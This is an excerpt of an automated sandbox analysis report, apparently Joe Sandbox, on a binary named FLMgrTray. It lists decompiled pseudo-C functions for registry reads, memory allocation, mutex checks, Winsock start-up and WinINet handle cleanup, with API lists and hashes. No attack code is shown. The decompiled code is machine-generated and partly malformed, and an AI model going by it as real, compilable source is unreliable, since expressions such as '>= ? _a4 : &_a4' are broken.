                                                                                        0x00183353
                                                                                        0x00183357
                                                                                        0x00183357
                                                                                        0x0018335d
                                                                                        0x00183363
                                                                                        0x00183305
                                                                                        0x0018336b
                                                                                        0x00183379

                                                                                        APIs
                                                                                        • RegQueryValueExW.KERNEL32(?,?,00000000,0017F3D2,00000000,00000001,2C80D730,00000005,00000001,?,0017F3D2), ref: 001832F3
                                                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00183308
                                                                                        • memset.VCRUNTIME140(00000000,00000000,?), ref: 00183314
                                                                                          • Part of subcall function 001827F0: RegQueryValueExW.KERNEL32(00000000,?,00000000,00000000,00000000,?,80000001,00000000,?,0018332D,?,00000000,?), ref: 00182810
                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,-00000002,?,00000000,?,?,?,?,?,?,?,?,?,?,80000001), ref: 0018335D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: QueryValue$freemallocmemset
                                                                                        • String ID:
                                                                                        • API String ID: 351114402-0
                                                                                        • Opcode ID: db5b84b51a899792a27f4c833f6e4bfbb9cef1660e0c2ec1e127ab4688734cb1
                                                                                        • Instruction ID: b3553613d522485618e90ad0c0933f01f46bbb86791f310a688089c5a7dd7b43
                                                                                        • Opcode Fuzzy Hash: db5b84b51a899792a27f4c833f6e4bfbb9cef1660e0c2ec1e127ab4688734cb1
                                                                                        • Instruction Fuzzy Hash: CB318F75900209ABDB10DF69DC81BAFB7B8FB48B04F14452AF815E7640EB75AB00CBA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 59%
                                                                                        			E00175703(int _a4) {
                                                                                        				char _v20;
                                                                                        				void* _t8;
                                                                                        				void* _t20;
                                                                                        				void* _t23;
                                                                                        
                                                                                        				_t20 = _t23;
                                                                                        				while(1) {
                                                                                        					_t8 = malloc(_a4); // executed
                                                                                        					if(_t8 != 0) {
                                                                                        						break;
                                                                                        					}
                                                                                        					_push(_a4);
                                                                                        					L0018C8D0();
                                                                                        					if(_t8 == 0) {
                                                                                        						if(_a4 != 0xffffffff) {
                                                                                        							_push(_t20);
                                                                                        							_t20 = _t23;
                                                                                        							_t23 = _t23 - 0xc;
                                                                                        							E0017631A( &_v20);
                                                                                        							_push(0x1992ec);
                                                                                        							_push( &_v20);
                                                                                        							L0018C89A();
                                                                                        							asm("int3");
                                                                                        						}
                                                                                        						_push(_t20);
                                                                                        						E0017634D( &_v20);
                                                                                        						_push(0x199324);
                                                                                        						_push( &_v20);
                                                                                        						L0018C89A();
                                                                                        						asm("int3");
                                                                                        						return 1;
                                                                                        					} else {
                                                                                        						continue;
                                                                                        					}
                                                                                        					L9:
                                                                                        				}
                                                                                        				return _t8;
                                                                                        				goto L9;
                                                                                        			}







                                                                                        0x00175704
                                                                                        0x00175715
                                                                                        0x00175718
                                                                                        0x00175720
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00175708
                                                                                        0x0017570b
                                                                                        0x00175713
                                                                                        0x00175728
                                                                                        0x00176392
                                                                                        0x00176393
                                                                                        0x00176395
                                                                                        0x0017639b
                                                                                        0x001763a0
                                                                                        0x001763a8
                                                                                        0x001763a9
                                                                                        0x001763ae
                                                                                        0x001763ae
                                                                                        0x001763af
                                                                                        0x001763b8
                                                                                        0x001763bd
                                                                                        0x001763c5
                                                                                        0x001763c6
                                                                                        0x001763cb
                                                                                        0x001763cf
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00175713
                                                                                        0x00175723
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • _callnewh.API-MS-WIN-CRT-HEAP-L1-1-0(2C80D730,?,00163245,2C80D730,?,string too long,0016353C,2C80D731,?,?,?,?,00176DD2,2C80D730,2C80D731,00000000), ref: 0017570B
                                                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(2C80D730,?,00163245,2C80D730,?,string too long,0016353C,2C80D731,?,?,?,?,00176DD2,2C80D730,2C80D731,00000000), ref: 00175718
                                                                                        • _CxxThrowException.VCRUNTIME140(?,001992EC,?), ref: 001763A9
                                                                                        • _CxxThrowException.VCRUNTIME140(?,00199324,?), ref: 001763C6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExceptionThrow$_callnewhmalloc
                                                                                        • String ID:
                                                                                        • API String ID: 4113974480-0
                                                                                        • Opcode ID: 910585c2aecedaa9a320597854b80857def52f6b89cec7a5fd7d64547f33cde7
                                                                                        • Instruction ID: af2177cda0bd308399e0ac5463b7850598fdfb87c92767083710a3a5464535c4
                                                                                        • Opcode Fuzzy Hash: 910585c2aecedaa9a320597854b80857def52f6b89cec7a5fd7d64547f33cde7
                                                                                        • Instruction Fuzzy Hash: A7F0B435840B0CB6CF08BAA8E846C9C777D6B10310B90C164B92C914D2EB70E758CAD0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 62%
                                                                                        			E0017FFA0(char _a4, signed int _a24) {
                                                                                        				intOrPtr _t19;
                                                                                        				intOrPtr _t22;
                                                                                        				signed int _t23;
                                                                                        				void* _t24;
                                                                                        				void* _t25;
                                                                                        
                                                                                        				_t13 =  >=  ? _a4 :  &_a4;
                                                                                        				if(OpenMutexW(0x1f0001, 0,  >=  ? _a4 :  &_a4) == 0) {
                                                                                        					_t16 =  >=  ? _a4 :  &_a4;
                                                                                        					CreateMutexW(0, 0,  >=  ? _a4 :  &_a4); // executed
                                                                                        					_t25 = 1;
                                                                                        				} else {
                                                                                        					_t25 = 0;
                                                                                        				}
                                                                                        				_t23 = _a24;
                                                                                        				if(_t23 >= 8) {
                                                                                        					_t22 = _a4;
                                                                                        					_t24 = 2 + _t23 * 2;
                                                                                        					_t19 = _t22;
                                                                                        					if(_t24 >= 0x1000) {
                                                                                        						_t22 =  *((intOrPtr*)(_t22 - 4));
                                                                                        						_t24 = _t24 + 0x23;
                                                                                        						if(_t19 > 0x1f) {
                                                                                        							__imp___invalid_parameter_noinfo_noreturn();
                                                                                        						}
                                                                                        					}
                                                                                        					_push(_t24);
                                                                                        					E00175733(_t19, _t22);
                                                                                        				}
                                                                                        				return _t25;
                                                                                        			}








                                                                                        0x0017ffab
                                                                                        0x0017ffbf
                                                                                        0x0017ffcc
                                                                                        0x0017ffd5
                                                                                        0x0017ffdb
                                                                                        0x0017ffc1
                                                                                        0x0017ffc1
                                                                                        0x0017ffc1
                                                                                        0x0017ffe0
                                                                                        0x0017ffe6
                                                                                        0x0017ffe8
                                                                                        0x0017ffeb
                                                                                        0x0017fff2
                                                                                        0x0017fffa
                                                                                        0x0017fffc
                                                                                        0x0017ffff
                                                                                        0x0018000a
                                                                                        0x0018000c
                                                                                        0x0018000c
                                                                                        0x0018000a
                                                                                        0x00180012
                                                                                        0x00180014
                                                                                        0x00180019
                                                                                        0x00180020

                                                                                        APIs
                                                                                        • OpenMutexW.KERNEL32(001F0001,00000000,?,?,?,0016BEE4,?,?), ref: 0017FFB7
                                                                                        • CreateMutexW.KERNEL32(00000000,00000000,?,?,0016BEE4,?,?), ref: 0017FFD5
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,0016BEE4,?,?), ref: 0018000C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: Mutex$CreateOpen_invalid_parameter_noinfo_noreturn
                                                                                        • String ID:
                                                                                        • API String ID: 3454607584-0
                                                                                        • Opcode ID: 5792323e4e4fc65cf704da926e30ac3b1e210257cb7bf0e5eec4b43733111c69
                                                                                        • Instruction ID: 60d129b088db058740902bf3ab2098d23f664ba1438c2488a42a8fe21338523f
                                                                                        • Opcode Fuzzy Hash: 5792323e4e4fc65cf704da926e30ac3b1e210257cb7bf0e5eec4b43733111c69
                                                                                        • Instruction Fuzzy Hash: 12018F3230010CEBDB14DF54DC49BEE37A9AB48791F508039FA08CA591D775DA95CFA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 75%
                                                                                        			E00161360(void* __eflags) {
                                                                                        				signed int _v8;
                                                                                        				char _v408;
                                                                                        				void* __ebp;
                                                                                        				signed int _t4;
                                                                                        				long _t9;
                                                                                        				signed int _t13;
                                                                                        
                                                                                        				_t4 =  *0x19d05c; // 0x2c80d730
                                                                                        				_v8 = _t4 ^ _t13;
                                                                                        				E001759A9(__eflags, E0018EA90);
                                                                                        				if(InterlockedIncrement(0x19dfc8) == 1) {
                                                                                        					_t9 =  &_v408;
                                                                                        					__imp__#115(2, _t9); // executed
                                                                                        					InterlockedExchange(0x19dfcc, _t9);
                                                                                        				}
                                                                                        				 *0x19df8c = 0x19df80;
                                                                                        				return E001755F4(_v8 ^ _t13);
                                                                                        			}









                                                                                        0x00161369
                                                                                        0x00161370
                                                                                        0x00161378
                                                                                        0x0016138e
                                                                                        0x00161390
                                                                                        0x00161399
                                                                                        0x001613a5
                                                                                        0x001613a5
                                                                                        0x001613b0
                                                                                        0x001613c2

                                                                                        APIs
                                                                                          • Part of subcall function 001759A9: __onexit.LIBCMT ref: 001759AF
                                                                                        • InterlockedIncrement.KERNEL32(0019DFC8), ref: 00161385
                                                                                        • WSAStartup.WS2_32(00000002,?), ref: 00161399
                                                                                        • InterlockedExchange.KERNEL32(0019DFCC,00000000), ref: 001613A5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: Interlocked$ExchangeIncrementStartup__onexit
                                                                                        • String ID:
                                                                                        • API String ID: 4053971687-0
                                                                                        • Opcode ID: 5aa4cc67aa68f7228b1a723ed8d4920d2c8f8190ea6c9601fb613792e7a863d6
                                                                                        • Instruction ID: 8772c1b53ab87ad01395f268864b91fb76356067dfe0ee09aa7176602e20a97d
                                                                                        • Opcode Fuzzy Hash: 5aa4cc67aa68f7228b1a723ed8d4920d2c8f8190ea6c9601fb613792e7a863d6
                                                                                        • Instruction Fuzzy Hash: 78F06571E00208EBDB00FBA4FD4B96D77B9FB15B10F804069F90B86680DB705A96CB63
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E00185D50(void* __ecx) {
                                                                                        				void* _t4;
                                                                                        				void* _t5;
                                                                                        				void* _t6;
                                                                                        				void* _t11;
                                                                                        
                                                                                        				_t11 = __ecx;
                                                                                        				_t4 =  *(__ecx + 0xc);
                                                                                        				if(_t4 != 0) {
                                                                                        					InternetCloseHandle(_t4); // executed
                                                                                        				}
                                                                                        				_t5 =  *(_t11 + 8);
                                                                                        				if(_t5 != 0) {
                                                                                        					InternetCloseHandle(_t5);
                                                                                        				}
                                                                                        				_t6 =  *(_t11 + 4);
                                                                                        				if(_t6 != 0) {
                                                                                        					return InternetCloseHandle(_t6);
                                                                                        				}
                                                                                        				return _t6;
                                                                                        			}







                                                                                        0x00185d58
                                                                                        0x00185d5a
                                                                                        0x00185d5f
                                                                                        0x00185d62
                                                                                        0x00185d62
                                                                                        0x00185d64
                                                                                        0x00185d69
                                                                                        0x00185d6c
                                                                                        0x00185d6c
                                                                                        0x00185d6e
                                                                                        0x00185d73
                                                                                        0x00000000
                                                                                        0x00185d76
                                                                                        0x00185d7a

                                                                                        APIs
                                                                                        • InternetCloseHandle.WININET(?), ref: 00185D62
                                                                                        • InternetCloseHandle.WININET(?), ref: 00185D6C
                                                                                        • InternetCloseHandle.WININET(?), ref: 00185D76
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseHandleInternet
                                                                                        • String ID:
                                                                                        • API String ID: 1081599783-0
                                                                                        • Opcode ID: c21eb1bb73e4db1e210bb58f79d794fcd6729fccaf0e08a517624936f2815c01
                                                                                        • Instruction ID: 15edf1bf35e6b8703edc70e89a265f55c27c338d93af47c4fbcc1dac3c7e86b2
                                                                                        • Opcode Fuzzy Hash: c21eb1bb73e4db1e210bb58f79d794fcd6729fccaf0e08a517624936f2815c01
                                                                                        • Instruction Fuzzy Hash: 42D01771B00A2666CB20AABEEC48E16A3DDFF44650308462BB804D3600CB60ED02CFF0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E00189F70(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                        				intOrPtr _t33;
                                                                                        				int _t37;
                                                                                        				void* _t52;
                                                                                        				intOrPtr _t55;
                                                                                        				int _t56;
                                                                                        				int _t60;
                                                                                        				int _t61;
                                                                                        				void* _t64;
                                                                                        				intOrPtr _t65;
                                                                                        				int _t66;
                                                                                        				int _t68;
                                                                                        				intOrPtr _t70;
                                                                                        				void* _t71;
                                                                                        
                                                                                        				_t65 = _a4;
                                                                                        				_t70 =  *((intOrPtr*)(_t65 + 0x1c));
                                                                                        				_t64 =  *(_t70 + 0x38);
                                                                                        				if(_t64 != 0) {
                                                                                        					L3:
                                                                                        					_t66 =  *(_t70 + 0x2c);
                                                                                        					if(_t66 == 0) {
                                                                                        						_t66 = 1 <<  *(_t70 + 0x28);
                                                                                        						 *(_t70 + 0x2c) = 1;
                                                                                        						 *(_t70 + 0x34) = 0;
                                                                                        						 *(_t70 + 0x30) = 0;
                                                                                        					}
                                                                                        					_t33 = _a8;
                                                                                        					_t55 = _a12;
                                                                                        					if(_t55 < _t66) {
                                                                                        						_t60 =  *(_t70 + 0x34);
                                                                                        						_t68 =  >  ? _t55 : _t66 - _t60;
                                                                                        						memcpy(_t64 + _t60, _t33 - _t55, _t68);
                                                                                        						_t56 = _t55 - _t68;
                                                                                        						if(_t56 == 0) {
                                                                                        							 *(_t70 + 0x34) =  *(_t70 + 0x34) + _t68;
                                                                                        							_t61 =  *(_t70 + 0x2c);
                                                                                        							if( *(_t70 + 0x34) == _t61) {
                                                                                        								 *(_t70 + 0x34) = 0;
                                                                                        							}
                                                                                        							_t37 =  *(_t70 + 0x30);
                                                                                        							if(_t37 < _t61) {
                                                                                        								 *(_t70 + 0x30) = _t37 + _t68;
                                                                                        							}
                                                                                        							return 0;
                                                                                        						} else {
                                                                                        							memcpy( *(_t70 + 0x38), _a8 - _t56, _t56);
                                                                                        							 *(_t70 + 0x34) = _t56;
                                                                                        							 *(_t70 + 0x30) =  *(_t70 + 0x2c);
                                                                                        							return 0;
                                                                                        						}
                                                                                        					} else {
                                                                                        						memcpy(_t64, _t33 - _t66, _t66);
                                                                                        						 *(_t70 + 0x30) =  *(_t70 + 0x2c);
                                                                                        						 *(_t70 + 0x34) = 0;
                                                                                        						return 0;
                                                                                        					}
                                                                                        				} else {
                                                                                        					_t52 =  *((intOrPtr*)( *((intOrPtr*)(_t65 + 0x20))))( *((intOrPtr*)(_t65 + 0x28)), 1 <<  *(_t70 + 0x28), 1); // executed
                                                                                        					_t64 = _t52;
                                                                                        					_t71 = _t71 + 0xc;
                                                                                        					 *(_t70 + 0x38) = _t64;
                                                                                        					if(_t64 != 0) {
                                                                                        						goto L3;
                                                                                        					} else {
                                                                                        						_t8 = _t64 + 1; // 0x1
                                                                                        						return _t8;
                                                                                        					}
                                                                                        				}
                                                                                        			}
















                                                                                        0x00189f75
                                                                                        0x00189f78
                                                                                        0x00189f7b
                                                                                        0x00189f80
                                                                                        0x00189faa
                                                                                        0x00189faa
                                                                                        0x00189faf
                                                                                        0x00189fb9
                                                                                        0x00189fbb
                                                                                        0x00189fbe
                                                                                        0x00189fc5
                                                                                        0x00189fc5
                                                                                        0x00189fcc
                                                                                        0x00189fd0
                                                                                        0x00189fd5
                                                                                        0x00189ff8
                                                                                        0x00189fff
                                                                                        0x0018a00a
                                                                                        0x0018a012
                                                                                        0x0018a014
                                                                                        0x0018a038
                                                                                        0x0018a03b
                                                                                        0x0018a041
                                                                                        0x0018a043
                                                                                        0x0018a043
                                                                                        0x0018a04a
                                                                                        0x0018a04f
                                                                                        0x0018a053
                                                                                        0x0018a053
                                                                                        0x0018a05c
                                                                                        0x0018a016
                                                                                        0x0018a020
                                                                                        0x0018a02b
                                                                                        0x0018a02e
                                                                                        0x0018a037
                                                                                        0x0018a037
                                                                                        0x00189fd7
                                                                                        0x00189fdc
                                                                                        0x00189fe7
                                                                                        0x00189fec
                                                                                        0x00189ff7
                                                                                        0x00189ff7
                                                                                        0x00189f82
                                                                                        0x00189f95
                                                                                        0x00189f97
                                                                                        0x00189f99
                                                                                        0x00189f9c
                                                                                        0x00189fa1
                                                                                        0x00000000
                                                                                        0x00189fa4
                                                                                        0x00189fa4
                                                                                        0x00189fa9
                                                                                        0x00189fa9
                                                                                        0x00189fa1

                                                                                        APIs
                                                                                        • memcpy.VCRUNTIME140(?,00000100,00000000,00164C1D,?,?,?,00188AC2,?,?,00000100,?,?), ref: 00189FDC
                                                                                        • memcpy.VCRUNTIME140(00000100,00000100,00000000,00164C1D,?,?,?,00188AC2,?,?,00000100,?,?), ref: 0018A00A
                                                                                        • memcpy.VCRUNTIME140(?,00000100,?,00000100,?,?), ref: 0018A020
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcpy
                                                                                        • String ID:
                                                                                        • API String ID: 3510742995-0
                                                                                        • Opcode ID: 6112693feed3570bb5438b00dfc9b4103cfc1565c47914ff9d998ecd14e4c5c6
                                                                                        • Instruction ID: 8707397f86a78e724d6a04004e08e3251ad6b088246244c6559c46d34790bf34
                                                                                        • Opcode Fuzzy Hash: 6112693feed3570bb5438b00dfc9b4103cfc1565c47914ff9d998ecd14e4c5c6
                                                                                        • Instruction Fuzzy Hash: EE318C72600B019FD720DE69D980A57B7EAFFD8364B44592EE44AC7E00E732F9158F50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                          • Part of subcall function 00182540: RegFlushKey.ADVAPI32(00000000,2C80D730,?,00000001), ref: 001825BB
                                                                                          • Part of subcall function 00182540: RegCloseKey.ADVAPI32(?,2C80D730,?,00000001), ref: 001825C3
                                                                                          • Part of subcall function 00182540: GetVersionExW.KERNEL32(00000001,2C80D730,?), ref: 00182611
                                                                                          • Part of subcall function 00183380: RegCloseKey.ADVAPI32(?,?,00000001,?,0017EC13,80000001,?,?), ref: 00183398
                                                                                          • Part of subcall function 00183380: RegFlushKey.ADVAPI32(?,?,00000001,?,0017EC13,80000001,?,?), ref: 001833B2
                                                                                          • Part of subcall function 00183380: RegCloseKey.ADVAPI32(?,?,00000001,?,0017EC13,80000001,?,?), ref: 001833BB
                                                                                        • _time64.API-MS-WIN-CRT-TIME-L1-1-0(80000001,?,?,00000000,80000001,2C80D730), ref: 0016E3AE
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,80000001,2C80D730), ref: 0016E406
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: Close$Flush$Version_invalid_parameter_noinfo_noreturn_time64
                                                                                        • String ID:
                                                                                        • API String ID: 1039918858-0
                                                                                        • Opcode ID: d0594e045c7eb8d35070d5d384ce69be59f0ac1a9b9a3a1666918e27c20a8425
                                                                                        • Instruction ID: 259f1f47735d2362ba19ca14fce5d30d3c16cc1d88659c2a4eae89c29160b758
                                                                                        • Opcode Fuzzy Hash: d0594e045c7eb8d35070d5d384ce69be59f0ac1a9b9a3a1666918e27c20a8425
                                                                                        • Instruction Fuzzy Hash: 4661F536D257488BDB07DB74C8416D9F7B4AF6A785F14C32BF80576662FB30A2D28640
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 18%
                                                                                        			E00183A80(void* __eflags, short _a4, intOrPtr _a20, signed int _a24, char _a28, signed int _a48) {
                                                                                        				char _v8;
                                                                                        				char _v16;
                                                                                        				intOrPtr _v20;
                                                                                        				signed int _t23;
                                                                                        				void* _t32;
                                                                                        				intOrPtr _t35;
                                                                                        				intOrPtr _t38;
                                                                                        				void* _t41;
                                                                                        				void* _t42;
                                                                                        				intOrPtr _t48;
                                                                                        				signed int _t50;
                                                                                        				signed int _t51;
                                                                                        				void* _t52;
                                                                                        				void* _t53;
                                                                                        				void* _t54;
                                                                                        				signed int _t58;
                                                                                        				void* _t59;
                                                                                        				intOrPtr _t61;
                                                                                        				void* _t62;
                                                                                        				void* _t63;
                                                                                        				void* _t64;
                                                                                        				void* _t66;
                                                                                        				void* _t68;
                                                                                        
                                                                                        				_t68 = __eflags;
                                                                                        				_t23 =  *0x19d05c; // 0x2c80d730
                                                                                        				 *[fs:0x0] =  &_v16;
                                                                                        				_t61 = _t59 - 0xfffffffffffffff0;
                                                                                        				_v8 = 1;
                                                                                        				_v20 = _t61;
                                                                                        				_t62 = _t61 - 0x18;
                                                                                        				E0016C3D0(_t62,  &_a28);
                                                                                        				E00184650(_t62, _t61, _t23 ^ _t58, _t54, _t41,  *[fs:0x0], E0018E568, 0xffffffff);
                                                                                        				_t63 = _t62 + 4;
                                                                                        				_v8 = 2;
                                                                                        				_t64 = _t63 - 0x18;
                                                                                        				E0016C3D0(_t64,  &_a4);
                                                                                        				_push(_t63);
                                                                                        				E00184770(_t64);
                                                                                        				_v8 = 1;
                                                                                        				_t32 = E00183840(_t68); // executed
                                                                                        				_t50 = _a24;
                                                                                        				_t66 = _t64 + 0x4c;
                                                                                        				_t42 = _t32;
                                                                                        				if(_t50 < 8) {
                                                                                        					L5:
                                                                                        					_t51 = _a48;
                                                                                        					_a20 = 0;
                                                                                        					_a24 = 7;
                                                                                        					_a4 = 0;
                                                                                        					if(_t51 >= 8) {
                                                                                        						_t48 = _a28;
                                                                                        						_t52 = 2 + _t51 * 2;
                                                                                        						_t35 = _t48;
                                                                                        						if(_t52 >= 0x1000) {
                                                                                        							_t48 =  *((intOrPtr*)(_t48 - 4));
                                                                                        							_t52 = _t52 + 0x23;
                                                                                        							if(_t35 > 0x1f) {
                                                                                        								__imp___invalid_parameter_noinfo_noreturn();
                                                                                        							}
                                                                                        						}
                                                                                        						_push(_t52);
                                                                                        						E00175733(_t35, _t48);
                                                                                        					}
                                                                                        					 *[fs:0x0] = _v16;
                                                                                        					return _t42;
                                                                                        				}
                                                                                        				_t49 = _a4;
                                                                                        				_t53 = 2 + _t50 * 2;
                                                                                        				_t38 = _t49;
                                                                                        				if(_t53 >= 0x1000) {
                                                                                        					_t12 = _t49 - 4; // 0x10dd5
                                                                                        					_t49 =  *_t12;
                                                                                        					_t53 = _t53 + 0x23;
                                                                                        					if(_t38 > 0x1f) {
                                                                                        						__imp___invalid_parameter_noinfo_noreturn();
                                                                                        					}
                                                                                        				}
                                                                                        				_push(_t53);
                                                                                        				E00175733(_t38, _t49);
                                                                                        				_t66 = _t66 + 8;
                                                                                        				goto L5;
                                                                                        			}


























                                                                                        0x00183a80
                                                                                        0x00183a96
                                                                                        0x00183aa1
                                                                                        0x00183aa7
                                                                                        0x00183aaa
                                                                                        0x00183ab1
                                                                                        0x00183ab9
                                                                                        0x00183abf
                                                                                        0x00183ac5
                                                                                        0x00183aca
                                                                                        0x00183acd
                                                                                        0x00183ad6
                                                                                        0x00183adc
                                                                                        0x00183ae1
                                                                                        0x00183ae2
                                                                                        0x00183aea
                                                                                        0x00183aee
                                                                                        0x00183af3
                                                                                        0x00183af6
                                                                                        0x00183af9
                                                                                        0x00183afe
                                                                                        0x00183b34
                                                                                        0x00183b34
                                                                                        0x00183b39
                                                                                        0x00183b40
                                                                                        0x00183b47
                                                                                        0x00183b4e
                                                                                        0x00183b50
                                                                                        0x00183b53
                                                                                        0x00183b5a
                                                                                        0x00183b62
                                                                                        0x00183b64
                                                                                        0x00183b67
                                                                                        0x00183b72
                                                                                        0x00183b74
                                                                                        0x00183b74
                                                                                        0x00183b72
                                                                                        0x00183b7a
                                                                                        0x00183b7c
                                                                                        0x00183b81
                                                                                        0x00183b89
                                                                                        0x00183b96
                                                                                        0x00183b96
                                                                                        0x00183b00
                                                                                        0x00183b03
                                                                                        0x00183b0a
                                                                                        0x00183b12
                                                                                        0x00183b14
                                                                                        0x00183b14
                                                                                        0x00183b17
                                                                                        0x00183b22
                                                                                        0x00183b24
                                                                                        0x00183b24
                                                                                        0x00183b22
                                                                                        0x00183b2a
                                                                                        0x00183b2c
                                                                                        0x00183b31
                                                                                        0x00000000

                                                                                        APIs
                                                                                          • Part of subcall function 00184650: WideCharToMultiByte.KERNEL32(00000000,00000000,013C1C88,?,00000000,00000000,00000000,00000000), ref: 001846A9
                                                                                          • Part of subcall function 00184650: memset.VCRUNTIME140(00000000,00000000,00000001,00000001), ref: 001846BC
                                                                                          • Part of subcall function 00184650: WideCharToMultiByte.KERNEL32(00000000,00000000,013C1C88,?,00000000,00000000,00000000,00000000), ref: 001846DD
